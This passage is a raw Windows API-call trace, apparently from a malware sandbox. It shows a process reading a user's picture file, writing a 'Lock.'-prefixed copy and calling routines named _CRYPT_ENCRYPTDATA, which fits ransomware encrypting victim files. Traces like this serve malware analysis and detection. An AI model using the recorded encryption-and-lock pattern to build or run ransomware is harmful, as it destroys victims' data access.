cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0252.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0252.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0252.009] CryptDestroyHash (hHash=0xa87310) returned 1 [0252.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.010] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0252.010] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0252.010] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.010] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/q0Ayv.png" (normalized: "c:\\users\\fd1hvy\\pictures\\q0ayv.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0252.011] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.011] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0252.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0252.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0252.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0252.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0252.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0252.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0252.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0252.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0252.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0252.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0252.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0252.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0252.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0252.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0252.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0252.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0252.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0252.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0252.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0252.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0252.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0252.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0252.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0252.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0252.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0252.012] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0252.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0252.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0252.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0252.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0252.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0252.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0252.013] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.q0Ayv.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.q0ayv.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0252.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0252.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0252.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0252.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0252.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0252.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0252.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0252.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0252.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0252.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0252.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0252.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0252.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0252.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0252.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0252.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0252.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0252.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0252.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0252.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0252.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0252.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0252.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0252.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0252.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0252.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0252.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0252.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0252.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5b020 [0252.018] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0252.018] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0xb42a, lpOverlapped=0x0) returned 1 [0252.021] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0252.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0252.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0252.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0252.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0252.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb42a) returned 0x2f14010 [0252.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5b020 | out: hHeap=0x970000) returned 1 [0252.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0252.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0252.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0252.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0252.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0252.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0252.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0252.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb42a) returned 0x2f1f448 [0252.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0252.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0252.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb42a) returned 0x2f14010 [0252.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0252.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0252.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0252.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0252.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0252.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0252.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0252.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0252.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0252.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0252.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0252.027] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0252.027] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0252.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0252.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0252.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0252.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0252.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0252.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0252.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0252.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0252.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0252.072] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0252.072] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0252.072] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0252.072] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0252.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0252.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0252.072] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0252.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0252.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0252.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0252.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0252.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0252.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0252.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0252.073] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0252.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0252.073] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0252.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0252.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0252.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0252.073] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0252.073] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0252.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0252.073] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0252.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0252.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0252.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0252.074] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0252.074] 